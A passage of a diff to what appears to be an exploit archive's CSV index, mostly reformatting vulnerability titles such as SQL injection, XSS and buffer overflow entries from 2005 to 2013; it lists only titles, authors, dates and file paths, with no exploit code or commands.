Vulnerabilities",2005-06-09,"James Bercegay",php,webapps,0 25809,platforms/osx/dos/25809.py,"CodeBlocks 12.11 (Mac OS X) - Crash POC",2013-05-29,ariarat,osx,dos,0 25810,platforms/hardware/webapps/25810.py,"TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit",2013-05-29,"Adam Simuntis",hardware,webapps,0 -25811,platforms/hardware/webapps/25811.py,"YeaLink IP Phone Firmware <=9.70.0.100 Unauthenticated Phone Call Vulnerability",2013-05-29,b0rh,hardware,webapps,0 +25811,platforms/hardware/webapps/25811.py,"YeaLink IP Phone Firmware <= 9.70.0.100 - Unauthenticated Phone Call Vulnerability",2013-05-29,b0rh,hardware,webapps,0 25812,platforms/hardware/webapps/25812.txt,"TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25813,platforms/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25814,platforms/windows/remote/25814.rb,"IBM SPSS SamplePower C1Tab ActiveX Heap Overflow",2013-05-29,metasploit,windows,remote,0 @@ -23020,7 +23020,7 @@ id,file,description,date,author,platform,type,port 25908,platforms/asp/webapps/25908.txt,"ASPPlayground.NET 3.2 SR1 Remote Arbitrary File Upload Vulnerability",2005-06-27,Psycho,asp,webapps,0 25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 IP Parameter HTML Injection Vulnerability",2005-06-27,Megabyte,php,webapps,0 25910,platforms/asp/webapps/25910.txt,"Community Server Forums 'SearchResults.aspx' Cross-Site Scripting Vulnerability",2005-06-28,abducter_minds@yahoo.com,asp,webapps,0 -25911,platforms/windows/dos/25911.py,"BisonFTP V4R1 Remote Denial Of Service Vulnerability",2005-06-28,fRoGGz,windows,dos,0 +25911,platforms/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial Of Service Vulnerability",2005-06-28,fRoGGz,windows,dos,0 25912,platforms/windows/local/25912.c,"Windows NT - Windows 8 EPATHOBJ Local Ring 0 Exploit",2013-06-03,"Tavis Ormandy",windows,local,0 25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 Error.ASP Cross-Site Scripting Vulnerability",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0 25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0 @@ -23096,15 +23096,15 @@ id,file,description,date,author,platform,type,port 25986,platforms/php/remote/25986.txt,"Plesk Apache Zeroday Remote Exploit",2013-06-05,Kingcope,php,remote,0 25987,platforms/hardware/remote/25987.txt,"Xpient Cash Drawer Operation Vulnerability",2013-06-05,"Core Security",hardware,remote,0 25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 MOD_ORADAV Access Control Vulnerability",2003-02-13,"David Litchfield",multiple,remote,0 -25989,platforms/windows/remote/25989.txt,"Nullsoft Winamp 5.0 Malformed ID3v2 Tag Buffer Overflow Vulnerability",2005-07-15,"Leon Juranic",windows,remote,0 +25989,platforms/windows/remote/25989.txt,"Nullsoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow Vulnerability",2005-07-15,"Leon Juranic",windows,remote,0 25990,platforms/php/webapps/25990.txt,"Clever Copy 2.0 Calendar.PHP Cross-Site Scripting Vulnerability",2005-07-15,Lostmon,php,webapps,0 25991,platforms/windows/dos/25991.txt,"Microsoft Internet Explorer 5.0.1 JPEG Image Rendering Unspecified Buffer Overflow Vulnerability",2005-07-15,"Michal Zalewski",windows,dos,0 25992,platforms/windows/dos/25992.txt,"Microsoft Internet Explorer 5.0.1 JPEG Image Rendering CMP Fencepost Denial Of Service Vulnerability",2005-07-15,"Michal Zalewski",windows,dos,0 -25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 Insecure Temporary File Creation Vulnerability",2005-07-18,"Giovanni Delvecchio",linux,local,0 +25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 Insecure Temporary File Creation Vulnerability",2005-07-18,"Giovanni Delvecchio",linux,local,0 25994,platforms/php/webapps/25994.txt,"OSCommerce 2.2 Update.PHP Information Disclosure Vulnerability",2005-07-18,"Andrew Hunter",php,webapps,0 25995,platforms/php/webapps/25995.txt,"e107 Website System 0.6 Nested BBCode URL Tag Script Injection Vulnerability",2005-07-18,"Nick Griffin",php,webapps,0 25996,platforms/php/webapps/25996.txt,"RuubikCMS 1.1.1 - Stored XSS Vulnerability",2013-06-07,expl0i13r,php,webapps,0 -25997,platforms/php/webapps/25997.txt,"tForum b0.9 Member.PHP Cross-Site Scripting Vulnerability",2005-07-18,wannacut,php,webapps,0 +25997,platforms/php/webapps/25997.txt,"tForum b0.9 Member.PHP Cross-Site Scripting Vulnerability",2005-07-18,wannacut,php,webapps,0 25998,platforms/hardware/webapps/25998.txt,"Asus RT56U 3.0.0.4.360 - Remote Command Injection",2013-06-07,drone,hardware,webapps,0 25999,platforms/windows/remote/25999.rb,"Microsoft Internet Explorer textNode Use-After-Free",2013-06-07,"Scott Bell",windows,remote,0 26001,platforms/java/webapps/26001.txt,"Novell GroupWise 6.5 WebAccess HTML Injection Vulnerability",2005-07-15,"Francisco Amato",java,webapps,0 @@ -23179,7 +23179,7 @@ id,file,description,date,author,platform,type,port 26072,platforms/php/webapps/26072.txt,"PortailPHP 2.4 Index.PHP SQL Injection Vulnerability",2005-08-04,abducter_minds@yahoo.com,php,webapps,0 26073,platforms/jsp/webapps/26073.txt,"Resin Application Server 4.0.36 Source Code Disclosure Vulnerability",2013-06-10,LiquidWorm,jsp,webapps,0 26075,platforms/hardware/remote/26075.txt,"MobileIron Virtual Smartphone Platform Privilege Escalation Exploit",2013-06-10,prdelka,hardware,remote,0 -26076,platforms/hardware/dos/26076.py,"Cisco ASA < 8.4.4.6|8.2.5.32 Ethernet Information Leak",2013-06-10,prdelka,hardware,dos,0 +26076,platforms/hardware/dos/26076.py,"Cisco ASA < 8.4.4.6 & 8.2.5.32 - Ethernet Information Leak",2013-06-10,prdelka,hardware,dos,0 26077,platforms/php/webapps/26077.txt,"concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities",2013-06-10,expl0i13r,php,webapps,0 26079,platforms/php/webapps/26079.txt,"Comdev ECommerce 3.0 Config.PHP Remote File Include Vulnerability",2005-08-05,Anonymous,php,webapps,0 26080,platforms/php/webapps/26080.txt,"Comdev eCommerce 3.0 WCE.Download.PHP Directory Traversal Vulnerability",2005-08-05,Anonymous,php,webapps,0 @@ -23305,7 +23305,7 @@ id,file,description,date,author,platform,type,port 26200,platforms/php/webapps/26200.txt,"SqWebMail 5.0 .4 HTML Email IMG Tag Script Injection Vulnerability",2005-08-29,"Jakob Balle",php,webapps,0 26201,platforms/php/webapps/26201.txt,"PHPWebNotes 2.0 Api.PHP Remote File Include Vulnerability",2005-08-29,nf2@scheinwelt.at,php,webapps,0 26202,platforms/php/webapps/26202.txt,"Looking Glass Cross-Site Scripting Vulnerability",2005-08-27,rgod,php,webapps,0 -26203,platforms/php/webapps/26203.php,"Looking Glass v20040427 Remote Command Execution Vulnerability",2005-08-27,rgod,php,webapps,0 +26203,platforms/php/webapps/26203.php,"Looking Glass 20040427 - Remote Command Execution Vulnerability",2005-08-27,rgod,php,webapps,0 26204,platforms/php/webapps/26204.pl,"MyBB Member.PHP SQL Injection Vulnerability",2005-08-29,W7ED,php,webapps,0 26205,platforms/php/webapps/26205.txt,"Land Down Under 700/701/800/801 index.php c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26206,platforms/php/webapps/26206.txt,"Land Down Under 700/701/800/801 events.php c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 @@ -23316,7 +23316,7 @@ id,file,description,date,author,platform,type,port 26211,platforms/php/webapps/26211.txt,"phpldapadmin 0.9.6/0.9.7 welcome.php custom_welcome_page Variable Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0 26212,platforms/php/webapps/26212.txt,"FlatNuke 2.5.6 ID Parameter Directory Traversal Vulnerability",2005-08-31,rgod,php,webapps,0 26213,platforms/php/webapps/26213.txt,"LibrettoCMS 2.2.2 - Arbitrary File Upload",2013-06-14,"CWH Underground",php,webapps,0 -26214,platforms/windows/dos/26214.py,"Easy LAN Folder Share Version 3.2.0.100 - Buffer Overflow Vulnerability",2013-06-14,ariarat,windows,dos,0 +26214,platforms/windows/dos/26214.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow Vulnerability",2013-06-14,ariarat,windows,dos,0 26215,platforms/php/webapps/26215.txt,"FlatNuke 2.5.6 USR Parameter Cross-Site Scripting Vulnerability",2005-08-31,rgod,php,webapps,0 26216,platforms/windows/dos/26216.txt,"Indiatimes Messenger 6.0 Remote Buffer Overflow Vulnerability",2005-08-31,ViPeR,windows,dos,0 26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 Lang.PHP Remote File Include Vulnerability",2005-08-31,groszynskif,php,webapps,0 @@ -23470,14 +23470,14 @@ id,file,description,date,author,platform,type,port 26372,platforms/php/webapps/26372.txt,"MySource 2.14 mimeDecode.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26373,platforms/php/webapps/26373.txt,"MySource 2.14 mime.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26374,platforms/windows/remote/26374.txt,"Xerver 4.17 Single Dot File Request Source Disclosure",2005-10-19,"Ziv Kamir",windows,remote,0 -26375,platforms/windows/remote/26375.txt,"Xerver 4.17 Crafted Request Forced Directory Listing",2005-10-19,"Ziv Kamir",windows,remote,0 +26375,platforms/windows/remote/26375.txt,"Xerver 4.17 - Forced Directory Listing",2005-10-19,"Ziv Kamir",windows,remote,0 26376,platforms/windows/remote/26376.txt,"Xerver 4.17 Server URI Null Character XSS",2005-10-19,"Ziv Kamir",windows,remote,0 26377,platforms/php/webapps/26377.txt,"PHPNuke Modules.PHP Search Module Remote Directory Traversal Vulnerability",2005-10-19,sp3x@securityreason.com,php,webapps,0 26378,platforms/php/webapps/26378.txt,"Chipmunk Forum newtopic.php forumID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26379,platforms/php/webapps/26379.txt,"Chipmunk Forum quote.php forumID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26380,platforms/php/webapps/26380.txt,"Chipmunk Forum recommend.php ID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26381,platforms/php/webapps/26381.txt,"Chipmunk Directory recommend.php entryID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 -26382,platforms/linux/local/26382.c,"Linux Kernel 2.6.x IPV6 Local Denial of Service Vulnerability",2005-10-20,"Rémi Denis-Courmont",linux,local,0 +26382,platforms/linux/local/26382.c,"Linux Kernel 2.6.x - IPV6 Local Denial of Service Vulnerability",2005-10-20,"Rémi Denis-Courmont",linux,local,0 26383,platforms/php/webapps/26383.txt,"Zomplog 3.3/3.4 Detail.PHP HTML Injection Vulnerability",2005-10-22,sikikmail,php,webapps,0 26384,platforms/php/webapps/26384.txt,"FlatNuke 2.5.x Index.PHP Multiple Remote File Include Vulnerabilities",2005-10-22,abducter_minds@yahoo.com,php,webapps,0 26385,platforms/php/webapps/26385.txt,"FlatNuke 2.5.x Index.PHP Cross-Site Scripting Vulnerability",2005-10-26,alex@aleksanet.com,php,webapps,0 @@ -23692,8 +23692,8 @@ id,file,description,date,author,platform,type,port 26602,platforms/php/webapps/26602.txt,"Enterprise Heart Enterprise Connector 1.0.2 send.php messageid Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26603,platforms/php/webapps/26603.txt,"Enterprise Heart Enterprise Connector 1.0.2 messages.php messageid Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26604,platforms/php/webapps/26604.txt,"Zainu 2.0 SQL Injection Vulnerabilities",2005-11-28,r0t,php,webapps,0 -26605,platforms/php/webapps/26605.txt,"Babe Logger V2 index.php gal Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26606,platforms/php/webapps/26606.txt,"Babe Logger V2 comments.php id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26605,platforms/php/webapps/26605.txt,"Babe Logger 2.0 - index.php gal Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26606,platforms/php/webapps/26606.txt,"Babe Logger 2.0 - comments.php id Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 26607,platforms/php/webapps/26607.txt,"Top Music Module 3.0 SQL Injection Vulnerabilities",2005-11-28,r0t,php,webapps,0 26608,platforms/php/webapps/26608.txt,"PHPWordPress 3.0 Multiple SQL Injection Vulnerabilities",2005-11-28,r0t,php,webapps,0 26609,platforms/php/webapps/26609.txt,"Bedeng PSP 1.1 baca.php ckode Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 @@ -23956,7 +23956,7 @@ id,file,description,date,author,platform,type,port 26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 Members.PHP Cross-Site Scripting Vulnerability",2005-12-19,krasza,php,webapps,0 26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 default.asp ID Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0 26874,platforms/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 acidcat.mdb Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps,0 -26875,platforms/asp/webapps/26875.txt,"allinta CMS 2.3.2 faq.asp s Parameter XSS",2005-12-19,r0t3d3Vil,asp,webapps,0 +26875,platforms/asp/webapps/26875.txt,"allinta CMS 2.3.2 faq.asp s Parameter XSS",2005-12-19,r0t3d3Vil,asp,webapps,0 26876,platforms/asp/webapps/26876.txt,"allinta CMS 2.3.2 search.asp searchQuery Parameter XSS",2005-12-19,r0t3d3Vil,asp,webapps,0 26877,platforms/php/webapps/26877.txt,"Box UK Amaxus CMS 3.0 Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0 26878,platforms/php/webapps/26878.txt,"Caravel CMS 3.0 Beta 1 Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps,0 @@ -23969,12 +23969,12 @@ id,file,description,date,author,platform,type,port 26885,platforms/php/webapps/26885.txt,"Lighthouse CMS 1.1 Search Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0 26886,platforms/linux/dos/26886.pl,"Squid 3.3.5 - DoS PoC",2013-07-16,Kingcope,linux,dos,0 26887,platforms/linux/dos/26887.rb,"rpcbind (CALLIT Procedure) UDP Crash PoC",2013-07-16,"Sean Verity",linux,dos,0 -26888,platforms/hardware/webapps/26888.txt,"FTP Sprite v1.2.1 iOS - Persistent XSS Vulnerability",2013-07-16,Vulnerability-Lab,hardware,webapps,0 +26888,platforms/hardware/webapps/26888.txt,"FTP Sprite 1.2.1 iOS - Persistent XSS Vulnerability",2013-07-16,Vulnerability-Lab,hardware,webapps,0 26889,platforms/windows/local/26889.pl,"BlazeDVD Pro player 6.1 - Stack Based Buffer Overflow (Direct Ret)",2013-07-16,PuN1sh3r,windows,local,0 26890,platforms/hardware/webapps/26890.txt,"Olive File Manager 1.0.1 iOS - Multiple Vulnerabilities",2013-07-16,Vulnerability-Lab,hardware,webapps,0 -26891,platforms/windows/dos/26891.py,"Light Audio Mixer Version 1.0.12 (.wav) - Crash POC",2013-07-16,ariarat,windows,dos,0 -26892,platforms/windows/dos/26892.py,"Kate's Video Toolkit Version 7.0 (.wav) - Crash POC",2013-07-16,ariarat,windows,dos,0 -26893,platforms/php/webapps/26893.txt,"Dell Kace 1000 SMA v5.4.70402 - Persistent XSS Vulnerabilities",2013-07-16,Vulnerability-Lab,php,webapps,0 +26891,platforms/windows/dos/26891.py,"Light Audio Mixer 1.0.12 - (.wav) Crash POC",2013-07-16,ariarat,windows,dos,0 +26892,platforms/windows/dos/26892.py,"Kate's Video Toolkit 7.0 - (.wav) Crash POC",2013-07-16,ariarat,windows,dos,0 +26893,platforms/php/webapps/26893.txt,"Dell Kace 1000 SMA 5.4.70402 - Persistent XSS Vulnerabilities",2013-07-16,Vulnerability-Lab,php,webapps,0 26894,platforms/php/webapps/26894.txt,"Saurus CMS 4.7.1 - Multiple Vulnerabilities",2013-07-16,waraxe,php,webapps,0 26895,platforms/php/webapps/26895.txt,"Magnolia Search Module 2.1 Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0 26896,platforms/php/webapps/26896.txt,"ContentServ 3.0/3.1/4.0 Index.PHP SQL Injection Vulnerability",2005-12-19,r0t,php,webapps,0 @@ -24032,10 +24032,10 @@ id,file,description,date,author,platform,type,port 26948,platforms/asp/webapps/26948.txt,"Sitekit CMS 6.6 Request-call-back.html ClickFrom Parameter XSS",2005-12-21,r0t3d3Vil,asp,webapps,0 26949,platforms/asp/webapps/26949.txt,"Sitekit CMS 6.6 registration-form.html ClickFrom Parameter XSS",2005-12-21,r0t3d3Vil,asp,webapps,0 26950,platforms/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation",2013-07-18,MJ0011,windows,local,0 -26951,platforms/windows/dos/26951.py,"Windows Movie Maker Version 2.1.4026.0 (.wav) - Crash POC",2013-07-18,ariarat,windows,dos,0 +26951,platforms/windows/dos/26951.py,"Windows Movie Maker 2.1.4026.0 - (.wav) Crash POC",2013-07-18,ariarat,windows,dos,0 26952,platforms/hardware/webapps/26952.txt,"WiFly 1.0 Pro iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,hardware,webapps,0 -26953,platforms/hardware/webapps/26953.txt,"Flux Player v3.1.0 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,hardware,webapps,0 -26954,platforms/hardware/webapps/26954.txt,"ePhoto Transfer v1.2.1 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,hardware,webapps,0 +26953,platforms/hardware/webapps/26953.txt,"Flux Player 3.1.0 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,hardware,webapps,0 +26954,platforms/hardware/webapps/26954.txt,"ePhoto Transfer 1.2.1 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,hardware,webapps,0 26955,platforms/php/webapps/26955.txt,"Xibo 1.2.2 and 1.4.1 (index.php, p param) - Directory Traversal Vulnerability",2013-07-18,Mahendra,php,webapps,0 26956,platforms/windows/webapps/26956.txt,"Dell PacketTrap MSP RMM 6.6.x - Multiple XSS Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps,0 26957,platforms/windows/webapps/26957.txt,"Dell PacketTrap PSA 7.1 - Multiple XSS Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps,0 @@ -24065,7 +24065,7 @@ id,file,description,date,author,platform,type,port 26981,platforms/php/webapps/26981.txt,"IceWarp Universal WebMail /dir/include.html lang Parameter Local File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 26982,platforms/php/webapps/26982.txt,"IceWarp Universal WebMail /mail/settings.html Language Parameter Local File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 26983,platforms/php/webapps/26983.txt,"IceWarp Universal WebMail /mail/index.html lang_settings Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 -26984,platforms/php/webapps/26984.txt,"IceWarp Universal WebMail /mail/include.html Crafted HTTP_USER_AGENT Arbitrary File Access",2005-12-27,"Tan Chew Keong",php,webapps,0 +26984,platforms/php/webapps/26984.txt,"IceWarp Universal WebMail /mail/include.html - Crafted HTTP_USER_AGENT Arbitrary File Access",2005-12-27,"Tan Chew Keong",php,webapps,0 26985,platforms/windows/dos/26985.txt,"Microsoft Internet Explorer 5.0.1 HTML Parsing Denial of Service Vulnerabilities",2005-12-27,"Christian Deneke",windows,dos,0 26986,platforms/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 Cross-Site Scripting Vulnerability",2005-12-23,r0t3d3Vil,cfm,webapps,0 26987,platforms/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,java,webapps,0 @@ -24139,7 +24139,7 @@ id,file,description,date,author,platform,type,port 27058,platforms/php/webapps/27058.txt,"PHPNuke 7.7 EV Search Module SQL Injection Vulnerability",2006-01-09,Lostmon,php,webapps,0 27059,platforms/php/webapps/27059.txt,"Xoops Pool Module IMG Tag HTML Injection Vulnerability",2006-01-09,night_warrior771,php,webapps,0 27060,platforms/php/webapps/27060.txt,"PHP-Nuke News Submission Story Text Field XSS",2006-01-09,night_warrior771,php,webapps,0 -27061,platforms/cgi/webapps/27061.txt,"Hummingbird Collaboration Crafted URL File Property Obscuration Download",2006-01-10,"Luca Carettoni",cgi,webapps,0 +27061,platforms/cgi/webapps/27061.txt,"Hummingbird Collaboration - Crafted URL File Property Obscuration Download",2006-01-10,"Luca Carettoni",cgi,webapps,0 27062,platforms/cgi/webapps/27062.txt,"Hummingbird Collaboration Application Cookie Internal Network Information Disclosure",2006-01-10,"Luca Carettoni",cgi,webapps,0 27063,platforms/asp/webapps/27063.txt,"WebWiz Forums Search_form.ASP Cross-Site Scripting Vulnerability",2006-01-10,nukedx,asp,webapps,0 27064,platforms/php/webapps/27064.txt,"Orjinweb Index.PHP Remote File Include Vulnerability",2006-01-10,serxwebun,php,webapps,0 @@ -24217,7 +24217,7 @@ id,file,description,date,author,platform,type,port 27137,platforms/php/webapps/27137.txt,"MyBB 1.0.2 Multiple Cross-Site Scripting Vulnerabilities",2005-12-26,imei,php,webapps,0 27138,platforms/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 Comentarios.PHP SQL Injection Vulnerability",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 27139,platforms/php/webapps/27139.txt,"My Little Homepage Products BBCode Link Tag Script Injection Vulnerability",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 -27140,platforms/multiple/dos/27140.txt,"Exiv2 Corrupted EXIF Data Denial Of Service Vulnerability",2006-01-26,"Maciek Wierciski",multiple,dos,0 +27140,platforms/multiple/dos/27140.txt,"Exiv2 - Corrupted EXIF Data Denial Of Service Vulnerability",2006-01-26,"Maciek Wierciski",multiple,dos,0 27141,platforms/cgi/webapps/27141.txt,"Elido Face Control 0 Multiple Directory Traversal Vulnerabilities",2006-01-26,"HSC Security Group",cgi,webapps,0 27142,platforms/asp/webapps/27142.txt,"ASPThai Forums 8.0 Login.ASP SQL Injection Vulnerability",2006-01-19,code.shell,asp,webapps,0 27143,platforms/asp/webapps/27143.txt,"ZixForum 1.12 Forum.ASP Multiple SQL Injection Vulnerabilities",2005-12-15,"Tran Viet Phuong",asp,webapps,0 @@ -24388,7 +24388,7 @@ id,file,description,date,author,platform,type,port 27313,platforms/php/webapps/27313.txt,"DCI-Taskeen 1.03 basket.php Multiple Parameter SQL Injection",2006-02-25,Linux_Drox,php,webapps,0 27314,platforms/php/webapps/27314.txt,"DCI-Taskeen 1.03 cat.php Multiple Parameter SQL Injection",2006-02-25,Linux_Drox,php,webapps,0 27315,platforms/php/webapps/27315.txt,"RiteCMS 1.0.0 - Multiple Vulnerabilities",2013-08-03,"Yashar shahinzadeh",php,webapps,0 -27316,platforms/windows/local/27316.py,"Easy LAN Folder Share Version 3.2.0.100 - Buffer Overflow Exploit (SEH)",2013-08-03,sagi-,windows,local,0 +27316,platforms/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow Exploit (SEH)",2013-08-03,sagi-,windows,local,0 27317,platforms/windows/dos/27317.txt,"StarUML WinGraphviz.dll - ActiveX Buffer Overflow Vulnerability",2013-08-03,d3b4g,windows,dos,0 27318,platforms/php/webapps/27318.txt,"PHP-Nuke 7.8 Mainfile.PHP SQL Injection Vulnerability",2006-02-25,waraxe,php,webapps,0 27319,platforms/hardware/remote/27319.txt,"Thomson SpeedTouch 500 Series NewUser Function 31 Variable Persistent User Creation",2006-02-25,"Preben Nylokken",hardware,remote,0 @@ -24410,8 +24410,8 @@ id,file,description,date,author,platform,type,port 27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 mb_send_mail() Function Parameter Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0 27336,platforms/php/webapps/27336.txt,"EJ3 TOPo 2.2.178 Inc_header.PHP Cross-Site Scripting Vulnerability",2006-02-28,"Yunus Emre Yilmaz",php,webapps,0 27337,platforms/php/webapps/27337.txt,"Mozilla Thunderbird 1.5 Multiple Remote Information Disclosure Vulnerabilities",2006-02-28,Crashfr,php,webapps,0 -27338,platforms/php/webapps/27338.txt,"PEHEPE Membership Management System v3 Sol_menu.PHP Cross-Site Scripting Vulnerability",2006-02-26,"Yunus Emre Yilmaz",php,webapps,0 -27339,platforms/php/webapps/27339.txt,"PEHEPE Membership Management System v3 Remote PHP Script Code Injection Vulnerability",2006-02-28,"Yunus Emre Yilmaz",php,webapps,0 +27338,platforms/php/webapps/27338.txt,"PEHEPE Membership Management System 3.0 - Sol_menu.PHP Cross-Site Scripting Vulnerability",2006-02-26,"Yunus Emre Yilmaz",php,webapps,0 +27339,platforms/php/webapps/27339.txt,"PEHEPE Membership Management System 3.0 - Remote PHP Script Code Injection Vulnerability",2006-02-28,"Yunus Emre Yilmaz",php,webapps,0 27340,platforms/php/webapps/27340.txt,"SMBlog 1.2 Arbitrary PHP Command Execution Vulnerability",2006-03-01,botan,php,webapps,0 27341,platforms/php/webapps/27341.txt,"DCI-Designs Dawaween 1.03 Poems.PHP SQL Injection Vulnerability",2006-03-02,sherba,php,webapps,0 27342,platforms/php/webapps/27342.txt,"PluggedOut Nexus 0.1 forgotten_password.PHP SQL Injection Vulnerability",2006-03-02,"Hamid Ebadi",php,webapps,0 @@ -24447,7 +24447,7 @@ id,file,description,date,author,platform,type,port 27373,platforms/php/webapps/27373.txt,"TextfileBB 1.0 Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,php,webapps,0 27374,platforms/php/webapps/27374.txt,"sBlog 0.7.2 search.php keyword Variable POST Method XSS",2006-03-09,Kiki,php,webapps,0 27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 comments_do.php Multiple Variable POST Method XSS",2006-03-09,Kiki,php,webapps,0 -27376,platforms/hardware/webapps/27376.txt,"FTP OnConnect v1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,hardware,webapps,0 +27376,platforms/hardware/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,hardware,webapps,0 27377,platforms/windows/dos/27377.txt,"Easy File Sharing Web Server 3.2 Format String DoS",2006-03-09,"Revnic Vasile",windows,dos,0 27378,platforms/windows/remote/27378.txt,"Easy File Sharing Web Server 3.2 Full Path Request Arbitrary File Upload",2006-03-09,"Revnic Vasile",windows,remote,0 27379,platforms/php/webapps/27379.txt,"ADP Forum 2.0.x Subject Field HTML Injection Vulnerability",2006-03-09,liz0,php,webapps,0 @@ -24716,8 +24716,8 @@ id,file,description,date,author,platform,type,port 27650,platforms/php/webapps/27650.txt,"FarsiNews 2.1/2.5 Search.PHP Cross-Site Scripting Vulnerability",2006-04-14,"amin emami",php,webapps,0 27651,platforms/php/webapps/27651.txt,"Tiny Web Gallery 1.4 Index.PHP Cross-Site Scripting Vulnerability",2006-04-15,Qex,php,webapps,0 27652,platforms/php/webapps/27652.txt,"Quack Chat 1.0 - Multiple Vulnerabilities",2013-08-17,"Dylan Irzi",php,webapps,80 -27655,platforms/hardware/webapps/27655.txt,"Copy to WebDAV v1.1 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,hardware,webapps,0 -27656,platforms/hardware/webapps/27656.txt,"Photo Transfer Upload v1.0 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,hardware,webapps,0 +27655,platforms/hardware/webapps/27655.txt,"Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,hardware,webapps,0 +27656,platforms/hardware/webapps/27656.txt,"Photo Transfer Upload 1.0 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,hardware,webapps,0 27658,platforms/php/webapps/27658.txt,"PHPGuestbook 0.0.2/1.0 HTML Injection Vulnerability",2006-04-15,Qex,php,webapps,0 27659,platforms/php/webapps/27659.txt,"phpFaber TopSites Index.PHP Cross-Site Scripting Vulnerability",2006-04-17,botan,php,webapps,0 27660,platforms/php/webapps/27660.txt,"Monster Top List 1.4 Functions.PHP Remote File Include Vulnerability",2006-04-17,r0t,php,webapps,0 @@ -24734,7 +24734,7 @@ id,file,description,date,author,platform,type,port 27671,platforms/php/webapps/27671.txt,"LinPHA 1.1 Multiple Cross-Site Scripting Vulnerabilities",2006-04-18,d4igoro,php,webapps,0 27672,platforms/cgi/webapps/27672.txt,"axoverzicht.CGI Cross-Site Scripting Vulnerability",2006-04-18,Qex,cgi,webapps,0 27673,platforms/php/webapps/27673.txt,"phpLinks 2.1.2/2.1.3 Index.PHP Cross-Site Scripting Vulnerability",2006-04-18,r0t,php,webapps,0 -27674,platforms/php/webapps/27674.txt,"RechnungsZentrale V2 1.1.3 Authent.PHP4 SQL Injection Vulnerability",2006-04-18,"GroundZero Security",php,webapps,0 +27674,platforms/php/webapps/27674.txt,"RechnungsZentrale 2 1.1.3 - Authent.PHP4 SQL Injection Vulnerability",2006-04-18,"GroundZero Security",php,webapps,0 27675,platforms/php/webapps/27675.txt,"PHPLister 0.4.1 Index.PHP Cross-Site Scripting Vulnerability",2006-04-18,botan,php,webapps,0 